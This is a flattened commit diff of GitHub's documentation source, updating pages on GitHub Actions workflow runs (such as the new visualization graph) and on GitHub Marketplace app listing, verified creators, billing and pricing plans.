py-2 px-3 col-12 col-lg-8 form-control" placeholder="Search code examples" type="search" autocomplete="off" aria-label="Search code examples"/> </div> <div class="d-flex flex-wrap gutter"> {% render 'code-example-card' for actionsCodeExamples as example %} </div> <button class="js-code-example-show-more btn btn-outline float-right">Show more {% octicon "arrow-right" %}</button> <button class="js-filter-card-show-more btn btn-outline float-right">Show more {% octicon "arrow-right" %}</button> <div class="js-code-example-no-results d-none py-4 text-center text-gray font-mktg"> <div class="js-filter-card-no-results d-none py-4 text-center text-gray font-mktg"> <div class="mb-3">{% octicon "search" width="24" %}</div> <h3 class="text-normal">Sorry, there is no result for <strong class="js-code-example-filter-value"></strong></h3> <h3 class="text-normal">Sorry, there is no result for <strong class="js-filter-card-value"></strong></h3> <p class="my-3 f4">It looks like we don't have an example that fits your filter.<br>Try another filter or add your code example</p> <a href="https://github.com/github/docs/blob/main/data/variables/action_code_examples.yml">Learn how to add a code example {% octicon "arrow-right" %}</a> </div> 11 content/actions/learn-github-actions/introduction-to-github-actions.md @@ -204,7 +204,7 @@ In this diagram, you can see the workflow file you just created and how the {% d ### Viewing the job's activity Once your job has started running, you can view each step's activity on {% data variables.product.prodname_dotcom %}. Once your job has started running, you can {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}see a visualization graph of the run's progress and {% endif %}view each step's activity on {% data variables.product.prodname_dotcom %}. {% data reusables.repositories.navigate-to-repo %} 1. Under your repository name, click **Actions**. @@ -213,7 +213,14 @@ Once your job has started running, you can view each step's activity on {% data  1. Under "Workflow runs", click the name of the run you want to see.  {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %} 1. Under **Jobs** or in the visualization graph, click the job you want to see.  {% endif %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %} 1. View the results of each step.  {% elsif currentVersion ver_gt "enterprise-server@2.22" %} 1. Click on the job name to see the results of each step.  {% else %} 7 content/actions/managing-workflow-runs/canceling-a-workflow.md @@ -17,9 +17,14 @@ versions: {% data reusables.repositories.navigate-to-repo %} {% data reusables.repositories.actions-tab %} {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. From the list of workflow runs, click the name of the `queued` or `in progress` run that you want to cancel.  1. In the upper-right corner of the workflow, click **Cancel workflow**. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} ### Steps {% data variables.product.prodname_dotcom %} takes to cancel a workflow run 4 content/actions/managing-workflow-runs/downloading-workflow-artifacts.md @@ -20,4 +20,8 @@ versions: {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. Under **Artifacts**, click the artifact you want to download. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} 1 content/actions/managing-workflow-runs/index.md @@ -18,6 +18,7 @@ versions: {% data reusables.actions.enterprise-beta %} {% data reusables.actions.enterprise-github-hosted-runners %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}{% link_in_list /using-the-visualization-graph %}{% endif %} {% link_in_list /viewing-workflow-run-history %} {% link_in_list /using-workflow-run-logs %} {% link_in_list /manually-running-a-workflow %} 3 content/actions/managing-workflow-runs/re-running-a-workflow.md @@ -16,5 +16,4 @@ versions: {% data reusables.repositories.actions-tab %} {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. In the upper-right corner of the workflow, use the **Re-run jobs** drop-down menu, and select **Re-run all jobs**.  1. In the upper-right corner of the workflow, use the **Re-run jobs** drop-down menu, and select **Re-run all jobs**.{% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}{% else %}{% endif %} 4 content/actions/managing-workflow-runs/removing-workflow-artifacts.md @@ -27,7 +27,11 @@ versions: {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. Under **Artifacts**, click {% octicon "trashcan" aria-label="The trashcan icon" %} next to the artifact you want to remove. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} ### Setting the retention period for an artifact 23 content/actions/managing-workflow-runs/using-the-visualization-graph.md @@ -0,0 +1,23 @@ --- title: Using the visualization graph intro: Every workflow run generates a real-time graph that illustrates the run progress. You can use this graph to monitor and debug workflows. product: '{% data reusables.gated-features.actions %}' versions: free-pro-team: '*' enterprise-server: '>=3.1' --- {% data reusables.actions.enterprise-beta %} {% data reusables.actions.visualization-beta %} {% data reusables.actions.enterprise-github-hosted-runners %} {% data reusables.repositories.navigate-to-repo %} {% data reusables.repositories.actions-tab %} {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. The graph displays each job in the workflow. An icon to the left of the job name indicates the status of the job. Lines between jobs indicate dependencies.  2. Click on a job to view the job log.  18 content/actions/managing-workflow-runs/using-workflow-run-logs.md @@ -45,7 +45,11 @@ You can search the build logs for a particular step. When you search logs, only {% data reusables.repositories.navigate-to-job-superlinter %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} 1. In the upper-right corner of the log output, in the **Search logs** search box, type a search query. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} {% else %} 1. To expand each step you want to include in your search, click the step.  @@ -63,8 +67,12 @@ You can download the log files from your workflow run. You can also download a w {% data reusables.repositories.view-run-superlinter %} {% data reusables.repositories.navigate-to-job-superlinter %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} 1. In the upper right corner, click {% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %} and select **Download log archive**. 1. In the upper right corner, click {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}{% octicon "gear" aria-label="The gear icon" %}{% else %}{% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %}{% endif %} and select **Download log archive**. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} {% else %} 1. In the upper right corner, click {% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %} and select **Download log archive**.  @@ -80,9 +88,17 @@ You can delete the log files from your workflow run. {% data reusables.repositor {% data reusables.repositories.view-run-superlinter %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@2.22" %} 1. In the upper right corner, click {% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %}. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} 2. To delete the log files, click the **Delete all logs** button and review the confirmation prompt. {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %}  {% else %}  {% endif %} After deleting logs, the **Delete all logs** button is removed to indicate that no log files remain in the workflow run. {% else %} 1. In the upper right corner, click {% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %}. 2 content/actions/managing-workflow-runs/viewing-job-execution-time.md @@ -15,7 +15,7 @@ Billable job execution minutes are only shown for jobs run on private repositori {% data reusables.repositories.actions-tab %} {% data reusables.repositories.navigate-to-workflow %} {% data reusables.repositories.view-run %} 1. Under the job summary, you can view the job's execution time. To view the billable job execution time, click **Run and billable time details**. 1. Under the job summary, you can view the job's execution time. To view details about the billable job execution time, click the time under **Billable time**.  {% note %} 5 content/actions/quickstart.md @@ -60,8 +60,13 @@ Committing the workflow file in your repository triggers the `push` event and ru {% data reusables.repositories.actions-tab %} {% data reusables.repositories.navigate-to-workflow-superlinter %} {% data reusables.repositories.view-run-superlinter %} {% if currentVersion == "free-pro-team@latest" or currentVersion ver_gt "enterprise-server@3.0" %} 1. Under **Jobs** or in the visualization graph, click the **Lint code base** job.  {% else %} 1. In the left sidebar, click the **Lint code base** job.  {% endif %} {% data reusables.repositories.view-failed-job-results-superlinter %} ### More starter workflows 49 content/developers/github-marketplace/about-github-marketplace.md @@ -1,6 +1,6 @@ --- title: About GitHub Marketplace intro: 'Learn the basics to prepare your app for review before joining {% data variables.product.prodname_marketplace %}.' intro: 'Learn about {% data variables.product.prodname_marketplace %} where you can share your apps and actions publicly with all {% data variables.product.product_name %} users.' redirect_from: - /apps/marketplace/getting-started/ - /marketplace/getting-started @@ -14,52 +14,41 @@ versions: {% data reusables.actions.actions-not-verified %} To learn about publishing {% data variables.product.prodname_actions %} in the {% data variables.product.prodname_marketplace %}, see "[Publishing actions in GitHub Marketplace](/actions/creating-actions/publishing-actions-in-github-marketplace)." To learn about publishing {% data variables.product.prodname_actions %} in {% data variables.product.prodname_marketplace %}, see "[Publishing actions in GitHub Marketplace](/actions/creating-actions/publishing-actions-in-github-marketplace)." ### Apps You can list verified and unverified apps in {% data variables.product.prodname_marketplace %}. Unverified apps do not go through the security, testing, and verification cycle {% data variables.product.prodname_dotcom %} requires for verified apps. Anyone can share their apps with other users on {% data variables.product.prodname_marketplace %} but only listings that are verified by {% data variables.product.company_short %} can include paid plans. For more information, see "[About verified creators](/developers/github-marketplace/about-verified-creators)." Verified apps have a green badge in {% data variables.product.prodname_marketplace %}. Unverified apps have a grey badge next to their listing and are only available as free apps. If you're interested in creating an app for {% data variables.product.prodname_marketplace %}, but you're new to {% data variables.product.prodname_github_apps %} or {% data variables.product.prodname_oauth_app %}s, see "[Building {% data variables.product.prodname_github_apps %}](/developers/apps/building-github-apps)" or "[Building {% data variables.product.prodname_oauth_app %}s](/developers/apps/building-oauth-apps)."  If you're interested in creating an app for {% data variables.product.prodname_marketplace %}, but you're new to {% data variables.product.prodname_github_apps %} and {% data variables.product.prodname_oauth_app %}s, see "[Building apps](/apps/)." {% data reusables.marketplace.github_apps_preferred %}, although you can list both OAuth and {% data variables.product.prodname_github_app %}s in {% data variables.product.prodname_marketplace %}. See "[Differences between GitHub and OAuth apps](/apps/differences-between-apps/)" for more details. To learn more about switching from OAuth to {% data variables.product.prodname_github_apps %}, see [Migrating OAuth Apps to {% data variables.product.prodname_github_app %}s](/apps/migrating-oauth-apps-to-github-apps/). {% data reusables.marketplace.github_apps_preferred %}, although you can list both OAuth and {% data variables.product.prodname_github_app %}s in {% data variables.product.prodname_marketplace %}. For more information, see "[Differences between {% data variables.product.prodname_github_apps %} and {% data variables.product.prodname_oauth_app %}s](/apps/differences-between-apps/)" and "[Migrating {% data variables.product.prodname_oauth_app %}s to {% data variables.product.prodname_github_apps %}](/apps/migrating-oauth-apps-to-github-apps/)." If you have questions about {% data variables.product.prodname_marketplace %}, please contact {% data variables.contact.contact_support %} directly. #### Unverified Apps Unverified apps do not need to meet the "[Requirements for listing an app on {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/requirements-for-listing-an-app-on-github-marketplace/)" or go through the "[Security review process](/marketplace/getting-started/security-review-process/)". {% data reusables.marketplace.unverified-apps %} Having a published paid plan will prevent you from being able to submit an unverified app. You must remove paid plans or keep them in draft mode before publishing an unverified app. To list your unverified app in {% data variables.product.prodname_marketplace %}, you only need to create a "[Listing on {% data variables.product.prodname_marketplace %}](/marketplace/listing-on-github-marketplace/)" and submit it as an unverified listing. {% data reusables.marketplace.launch-with-free %} ### Publishing an app to {% data variables.product.prodname_marketplace %} #### Verified Apps When you have finished creating your app, you can share it with other users by publishing it to {% data variables.product.prodname_marketplace %}. In summary, the process is: If you've already built an app and you're interested in submitting a verified listing in {% data variables.product.prodname_marketplace %}, start here: 1. Review your app carefully to ensure that it will behave as expected in other repositories and that it follows best practice guidelines. For more information, see "[Security best practices for apps](/developers/github-marketplace/security-best-practices-for-apps)" and "[Requirements for listing an app](/developers/github-marketplace/requirements-for-listing-an-app#best-practice-for-customer-experience)." 1. [Getting started with {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/)<br/>Learn about requirements, guidelines, and the app submission process. 1. Add webhook events to the app to track user billing requests. For more information about the {% data variables.product.prodname_marketplace %} API, webhook events, and billing requests, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." 1. [Integrating with the {% data variables.product.prodname_marketplace %} API](/marketplace/integrating-with-the-github-marketplace-api/)<br/>Before you can list your app on {% data variables.product.prodname_marketplace %}, you'll need to integrate billing flows using the {% data variables.product.prodname_marketplace %} API and webhook events. 1. Create a draft {% data variables.product.prodname_marketplace %} listing. For more information, see "[Drafting a listing for your app](/developers/github-marketplace/drafting-a-listing-for-your-app)." 1. [Listing on {% data variables.product.prodname_marketplace %}](/marketplace/listing-on-github-marketplace/) <br/>Create a draft {% data variables.product.prodname_marketplace %} listing, configure webhook settings, and set up pricing plans. 1. Add a pricing plan. For more information, see "[Setting pricing plans for your listing](/developers/github-marketplace/setting-pricing-plans-for-your-listing)." 1. [Selling your app](/marketplace/selling-your-app/)<br/>Learn about pricing plans, billing cycles, and how to receive payment from {% data variables.product.prodname_dotcom %} for your app. 1. Check whether your app meets the requirements for listing on {% data variables.product.prodname_marketplace %} as a free or a paid app. For more information, see "[Requirements for listing an app](/developers/github-marketplace/requirements-for-listing-an-app)." 1. [{% data variables.product.prodname_marketplace %} Insights](/marketplace/github-marketplace-insights/)<br/>See how your app is performing in {% data variables.product.prodname_marketplace %}. You can use metrics collected by {% data variables.product.prodname_dotcom %} to guide your marketing campaign and be successful in {% data variables.product.prodname_marketplace %}. 1. Read and accept the terms of the "[{% data variables.product.prodname_marketplace %} Developer Agreement](/articles/github-marketplace-developer-agreement/)." 1. [{% data variables.product.prodname_marketplace %} transactions](/marketplace/github-marketplace-transactions/)<br/>Download and view transaction data for your {% data variables.product.prodname_marketplace %} listing. 1. Submit your listing for publication in {% data variables.product.prodname_marketplace %}, requesting verification if you want to sell the app. For more information, see "[Submitting your listing for publication](/developers/github-marketplace/submitting-your-listing-for-publication)." ### Reviewing your app An onboarding expert will contact you with any questions or further steps. For example, if you have added a paid plan, you will need to complete the verification process and complete financial onboarding. As soon as your listing is approved the app is published to {% data variables.product.prodname_marketplace %}. We want to make sure that the apps offered on {% data variables.product.prodname_marketplace %} are safe, secure, and well tested. The {% data variables.product.prodname_marketplace %} onboarding specialists will review your app to ensure that it meets all requirements. Follow the guidelines in these articles before submitting your app: ### Seeing how your app is performing You can access metrics and transactions for your listing. For more information, see: * [Requirements for listing an app on {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/requirements-for-listing-an-app-on-github-marketplace/) * [Security review process](/marketplace/getting-started/security-review-process/) - "[Viewing metrics for your listing](/developers/github-marketplace/viewing-metrics-for-your-listing)" - "[Viewing transactions for your listing](/developers/github-marketplace/viewing-transactions-for-your-listing)" 43 content/developers/github-marketplace/about-verified-creators.md @@ -0,0 +1,43 @@ --- title: About verified creators intro: 'Each organization that wants to sell apps on {% data variables.product.prodname_marketplace %} must follow a verification process. Their identity is checked and their billing process reviewed.' versions: free-pro-team: '*' --- ### About verified creators A verified creator is an organization that {% data variables.product.company_short %} has checked. Anyone can share their apps with other users on {% data variables.product.prodname_marketplace %} but only organizations that are verified by {% data variables.product.company_short %} can sell apps. For more information about organizations, see "[About organizations](/github/setting-up-and-managing-organizations-and-teams/about-organizations)." The verification process aims to protect users. For example, it verifies the seller's identity, checks that their {% data variables.product.product_name %} organization is set up securely, and that they can be contacted for support. After passing the verification checks, any apps that the organization lists on {% data variables.product.prodname_marketplace %} are shown with a verified creator badge {% octicon "verified" aria-label="Verified creator badge" %}. The organization can now add paid plans to any of their apps. Each app with a paid plan also goes through a financial onboarding process to check that it's set up to handle billing correctly.  In addition to the verified creator badge, you'll also see badges for unverified and verified apps. These apps were published using the old method for verifying individual apps.  For information on finding apps to use, see "[Searching {% data variables.product.prodname_marketplace %}](/github/searching-for-information-on-github/searching-github-marketplace)." ### About the verification process The first time you request verification for a listing of one of your apps, you will enter the verification process. An onboarding expert will guide you through the process. This includes checking: - Profile information - The basic profile information is populated accurately and appropriately. - Security - The organization has enabled two-factor authentication. - Verified domain - The organization has verified the domain of the site URL. - Purchase webhook event - The event is handled correctly by the app. When your organization is verified, all your apps are shown with a verified creator badge. You are now able to offer paid plans for any of your apps. For more information about the requirements for listing an app on {% data variables.product.prodname_marketplace %}, see "[Requirements for listing an app on {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/requirements-for-listing-an-app-on-github-marketplace/)." {% data reusables.marketplace.app-transfer-to-org-for-verification %} For information on how to do this, see: "[Submitting your listing for publication](/developers/github-marketplace/submitting-your-listing-for-publication#transferring-an-app-to-an-organization-before-you-submit)." {% note %} **Note:** This verification process for apps replaces the previous process where individual apps were verified. The current process is similar to the verification process for actions. If you have apps that were verified under the old process, these will not be affected by the changes. The {% data variables.product.prodname_marketplace %} team will contact you with details of how to migrate to organization-based verification. {% endnote %} 12 content/developers/github-marketplace/billing-customers.md @@ -13,17 +13,17 @@ versions: ### Understanding the billing cycle Customers can choose a monthly or yearly billing cycle when they purchase your app. All changes customers make to the billing cycle and plan selection will trigger a `marketplace_purchase` event. You can refer to the `marketplace_purchase` webhook payload to see which billing cycle a customer selects and when the next billing date begins (`effective_date`). For more information about webhook payloads, see "[{% data variables.product.prodname_marketplace %} webhook events](/marketplace/integrating-with-the-github-marketplace-api/github-marketplace-webhook-events/)." Customers can choose a monthly or yearly billing cycle when they purchase your app. All changes customers make to the billing cycle and plan selection will trigger a `marketplace_purchase` event. You can refer to the `marketplace_purchase` webhook payload to see which billing cycle a customer selects and when the next billing date begins (`effective_date`). For more information about webhook payloads, see "[Webhook events for the {% data variables.product.prodname_marketplace %} API](/developers/github-marketplace/webhook-events-for-the-github-marketplace-api)." ### Providing billing services in your app's UI Customers must be able to perform the following actions from your app's website: - Customers must be able to modify or cancel their {% data variables.product.prodname_marketplace %} plans for personal and organizational accounts separately. Customers should be able to perform the following actions from your app's website: - Customers should be able to modify or cancel their {% data variables.product.prodname_marketplace %} plans for personal and organizational accounts separately. {% data reusables.marketplace.marketplace-billing-ui-requirements %} ### Billing services for upgrades, downgrades, and cancellations Follow these guidelines for upgrades, downgrades, and cancellations to maintain a clear and consistent billing process. For more detailed instructions about the {% data variables.product.prodname_marketplace %} purchase events, see "[Billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows)." Follow these guidelines for upgrades, downgrades, and cancellations to maintain a clear and consistent billing process. For more detailed instructions about the {% data variables.product.prodname_marketplace %} purchase events, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." You can use the `marketplace_purchase` webhook's `effective_date` key to determine when a plan change will occur and periodically synchronize the [List accounts for a plan](/rest/reference/apps#list-accounts-for-a-plan). @@ -33,7 +33,7 @@ When a customer upgrades their pricing plan or changes their billing cycle from {% data reusables.marketplace.marketplace-failed-purchase-event %} For information about building upgrade and downgrade workflows into your app, see "[Upgrading and downgrading plans](/marketplace/integrating-with-the-github-marketplace-api/upgrading-and-downgrading-plans/)." For information about building upgrade and downgrade workflows into your app, see "[Handling plan changes](/developers/github-marketplace/handling-plan-changes)." #### Downgrades and cancellations @@ -45,4 +45,4 @@ When a customer cancels a plan, you must: {% data reusables.marketplace.cancellation-clarification %} - Enable them to upgrade the plan through GitHub if they would like to continue the plan at a later time. For information about building cancellation workflows into your app, see "[Cancelling plans](/marketplace/integrating-with-the-github-marketplace-api/cancelling-plans/)." For information about building cancellation workflows into your app, see "[Handling plan cancellations](/developers/github-marketplace/handling-plan-cancellations)." 20 ...nt/developers/github-marketplace/customer-experience-best-practices-for-apps.md @@ -0,0 +1,20 @@ --- title: Customer experience best practices for apps intro: 'Guidelines for creating an app that will be easy to use and understand.' shortTitle: Customer experience best practice versions: free-pro-team: '*' --- If you follow these best practices it will help you to provide a good customer experience. ### Customer communication - Marketing materials for the app should accurately represent the app's behavior. - Apps should include links to user-facing documentation that describe how to set up and use the app. - Customers should be able to see what type of plan they have in the billing, profile, or account settings section of the app. - Customers should be able to install and use your app on both a personal account and an organization account. They should be able to view and manage the app on those accounts separately. ### Plan management {% data reusables.marketplace.marketplace-billing-ui-requirements %} 4 content/developers/github-marketplace/drafting-a-listing-for-your-app.md @@ -59,8 +59,8 @@ Once you've created a {% data variables.product.prodname_marketplace %} draft li ### Submitting your app Once you've completed your {% data variables.product.prodname_marketplace %} listing, you can submit your listing for review from the **Overview** page. You'll need to read and accept the "[{% data variables.product.prodname_marketplace %} Developer Agreement](/articles/github-marketplace-developer-agreement/)," and then you can click **Submit for review**. After you submit your app for review, the {% data variables.product.prodname_marketplace %} onboarding team will contact you with additional information about the onboarding process. You can learn more about the onboarding and security review process in "[Getting started with {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/)." Once you've completed your {% data variables.product.prodname_marketplace %} listing, you can submit your listing for review from the **Overview** page. You'll need to read and accept the "[{% data variables.product.prodname_marketplace %} Developer Agreement](/articles/github-marketplace-developer-agreement/)," and then you can click **Submit for review**. After you submit your app for review, an onboarding expert will contact you with additional information about the onboarding process. You can learn more about the onboarding and security review process in "[Getting started with {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/)." ### Removing a {% data variables.product.prodname_marketplace %} listing If you no longer want to list your app in {% data variables.product.prodname_marketplace %}, contact [marketplace@github.com](mailto:marketplace@github.com) to remove your listing. If you no longer want to list your app in {% data variables.product.prodname_marketplace %}, contact {% data variables.contact.contact_support %} to remove your listing. 2 content/developers/github-marketplace/handling-new-purchases-and-free-trials.md @@ -28,7 +28,7 @@ GitHub then sends the [`marketplace_purchase`](/webhooks/event-payloads/#marketp Read the `effective_date` and `marketplace_purchase` object from the `marketplace_purchase` webhook to determine which plan the customer purchased, when the billing cycle starts, and when the next billing cycle begins. If your app offers a free trial, read the `marketplace_purchase[on_free_trial]` attribute from the webhook. If the value is `true`, your app will need to track the free trial start date (`effective_date`) and the date the free trial ends (`free_trial_ends_on`). Use the `free_trial_ends_on` date to display the remaining days left in a free trial in your app's UI. You can do this in either a banner or in your [billing UI](/marketplace/selling-your-app/billing-customers-in-github-marketplace/#providing-billing-services-in-your-apps-ui). To learn how to handle cancellations before a free trial ends, see "[Cancelling plans](/marketplace/integrating-with-the-github-marketplace-api/cancelling-plans/)." See "[Upgrading and downgrading plans](/marketplace/integrating-with-the-github-marketplace-api/upgrading-and-downgrading-plans/)" to find out how to transition a free trial to a paid plan when a free trial expires. If your app offers a free trial, read the `marketplace_purchase[on_free_trial]` attribute from the webhook. If the value is `true`, your app will need to track the free trial start date (`effective_date`) and the date the free trial ends (`free_trial_ends_on`). Use the `free_trial_ends_on` date to display the remaining days left in a free trial in your app's UI. You can do this in either a banner or in your [billing UI](/marketplace/selling-your-app/billing-customers-in-github-marketplace/#providing-billing-services-in-your-apps-ui). To learn how to handle cancellations before a free trial ends, see "[Handling plan cancellations](/developers/github-marketplace/handling-plan-cancellations)." See "[Handling plan changes](/developers/github-marketplace/handling-plan-changes)" to find out how to transition a free trial to a paid plan when a free trial expires. See "[{% data variables.product.prodname_marketplace %} webhook events](/marketplace/integrating-with-the-github-marketplace-api/github-marketplace-webhook-events/)" for an example of the `marketplace_purchase` event payload. 6 content/developers/github-marketplace/index.md @@ -11,8 +11,10 @@ versions: {% topic_link_in_list /creating-apps-for-github-marketplace %} {% link_in_list /about-github-marketplace %} {% link_in_list /about-verified-creators %} {% link_in_list /requirements-for-listing-an-app %} {% link_in_list /security-review-process-for-submitted-apps %} {% link_in_list /security-best-practices-for-apps %} {% link_in_list /customer-experience-best-practices-for-apps %} {% link_in_list /viewing-metrics-for-your-listing %} {% link_in_list /viewing-transactions-for-your-listing %} {% topic_link_in_list /using-the-github-marketplace-api-in-your-app %} @@ -27,7 +29,7 @@ versions: {% link_in_list /writing-a-listing-description-for-your-app %} {% link_in_list /setting-pricing-plans-for-your-listing %} {% link_in_list /configuring-a-webhook-to-notify-you-of-plan-changes %} {% link_in_list /submitting-your-listing-for-review %} {% link_in_list /submitting-your-listing-for-publication %} {% topic_link_in_list /selling-your-app-on-github-marketplace %} {% link_in_list /pricing-plans-for-github-marketplace-apps %} {% link_in_list /billing-customers %} 32 content/developers/github-marketplace/pricing-plans-for-github-marketplace-apps.md @@ -10,35 +10,45 @@ versions: {% data variables.product.prodname_marketplace %} pricing plans can be free, flat rate, or per-unit, and GitHub lists the price in US dollars. Customers purchase your app using a payment method attached to their {% data variables.product.product_name %} account, without having to leave GitHub.com. You don't have to write code to perform billing transactions, but you will have to handle [billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows) for purchase events. {% data variables.product.prodname_marketplace %} pricing plans can be free, flat rate, or per-unit. Prices are set, displayed, and processed in US dollars. Paid plans are restricted to verified listings. Customers purchase your app using a payment method attached to their {% data variables.product.product_name %} account, without having to leave {% data variables.product.prodname_dotcom_the_website %}. You don't have to write code to perform billing transactions, but you will have to handle events from the {% data variables.product.prodname_marketplace %} API. For more information, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." If the app you're listing on {% data variables.product.prodname_marketplace %} has multiple plan options, you can set up corresponding pricing plans. For example, if your app has two plan options, an open source plan and a pro plan, you can set up a free pricing plan for your open source plan and a flat pricing plan for your pro plan. Each {% data variables.product.prodname_marketplace %} listing must have an annual and a monthly price for every plan that's listed. For more information on how to create a pricing plan, see "[Setting a {% data variables.product.prodname_marketplace %} listing's pricing plan](/marketplace/listing-on-github-marketplace/setting-a-github-marketplace-listing-s-pricing-plan/)." {% note %} {% data reusables.marketplace.free-plan-note %} **Note:** If you're listing an app on {% data variables.product.prodname_marketplace %}, you can't list your app with a free pricing plan if you offer a paid service outside of {% data variables.product.prodname_marketplace %}. ### Types of pricing plans {% endnote %} #### Free pricing plans ### Types of pricing plans {% data reusables.marketplace.free-apps-encouraged %} Free plans are completely free for users. If you set up a free pricing plan, you cannot charge users that choose the free pricing plan for the use of your app. You can create both free and paid plans for your listing. All apps need to handle events for new purchases and cancellations. Apps that only have free plans do not need to handle events for free trials, upgrades, and downgrades. For more information, see: "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." If you add a paid plan to an app that you've already listed in {% data variables.product.prodname_marketplace %} as a free service, you'll need to request verification for the app and go through financial onboarding. #### Paid pricing plans **Free pricing plans** are completely free for users. If you set up a free pricing plan, you cannot charge users that choose the free pricing plan for the use of your app. You can create both free and paid plans for your listing. Unverified free apps do not need to implement any billing flows. Free apps that are verified by Github need to implement billing flows for new purchases and cancellations, but do not need to implement billing flows for free trials, upgrades, and downgrades. If you add a paid plan to an app that you've already listed in {% data variables.product.prodname_marketplace %} as a free service, you'll need to resubmit the app for review. There are two types of paid pricing plan: **Flat rate pricing plans** charge a set fee on a monthly and yearly basis. - Flat rate pricing plans charge a set fee on a monthly and yearly basis. **Per-unit pricing plans** charge a set fee on either a monthly or yearly basis for a unit that you specify. A "unit" can be anything you'd like (for example, a user, seat, or person). - Per-unit pricing plans charge a set fee on either a monthly or yearly basis for a unit that you specify. A "unit" can be anything you'd like (for example, a user, seat, or person). **Marketplace free trials** provide 14-day free trials of OAuth or GitHub Apps to customers. When you [set up a Marketplace pricing plan](/marketplace/listing-on-github-marketplace/setting-a-github-marketplace-listing-s-pricing-plan/), you can select the option to provide a free trial for flat-rate or per-unit pricing plans. You may also want to offer free trials. These provide free, 14-day trials of OAuth or GitHub Apps to customers. When you set up a Marketplace pricing plan, you can select the option to provide a free trial for flat-rate or per-unit pricing plans. ### Free trials Customers can start a free trial for any available paid plan on a Marketplace listing, but will not be able to create more than one free trial for a Marketplace product. Customers can start a free trial for any paid plan on a Marketplace listing that includes free trials. However, customers cannot create more than one free trial per marketplace product. Free trials have a fixed length of 14 days. Customers are notified 4 days before the end of their trial period (on day 11 of the free trial) that their plan will be upgraded. At the end of a free trial, customers will be auto-enrolled into the plan they are trialing if they do not cancel. See "[New purchases and free trials](/marketplace/integrating-with-the-github-marketplace-api/handling-new-purchases-and-free-trials/)" for details on how to handle free trials in your app. For more information, see: "[Handling new purchases and free trials](/developers/github-marketplace/integrating-with-the-github-marketplace-api/handling-new-purchases-and-free-trials/)." {% note %} 61 content/developers/github-marketplace/requirements-for-listing-an-app.md @@ -1,6 +1,6 @@ --- title: Requirements for listing an app intro: 'Apps on {% data variables.product.prodname_marketplace %} must meet the requirements outlined on this page before our {% data variables.product.prodname_marketplace %} onboarding specialists will approve the listing.' intro: 'Apps on {% data variables.product.prodname_marketplace %} must meet the requirements outlined on this page before the listing can be published.' redirect_from: - /apps/adding-integrations/listing-apps-on-github-marketplace/requirements-for-listing-an-app-on-github-marketplace/ - /apps/marketplace/listing-apps-on-github-marketplace/requirements-for-listing-an-app-on-github-marketplace/ @@ -12,49 +12,62 @@ versions: free-pro-team: '*' --- <!--UI-LINK: Displayed as a link on the https://github.com/marketplace/new page.--> The requirements for listing an app on {% data variables.product.prodname_marketplace %} vary according to whether you want to offer a free or a paid app. Before you submit your app for review, you must read and accept the terms of the "[{% data variables.product.prodname_marketplace %} Developer Agreement](/articles/github-marketplace-developer-agreement/)." You'll accept the terms within your [draft listing](/marketplace/listing-on-github-marketplace/creating-a-draft-github-marketplace-listing/) on {% data variables.product.product_name %}. Once you've submitted your app, one of the {% data variables.product.prodname_marketplace %} onboarding specialists will reach out to you with more information about the onboarding process, and review your app to ensure it meets these requirements: ### Requirements for all {% data variables.product.prodname_marketplace %} listings ### User experience All listings on {% data variables.product.prodname_marketplace %} should be for tools that provide value to the {% data variables.product.product_name %} community. When you submit your listing for publication, you must read and accept the terms of the "[{% data 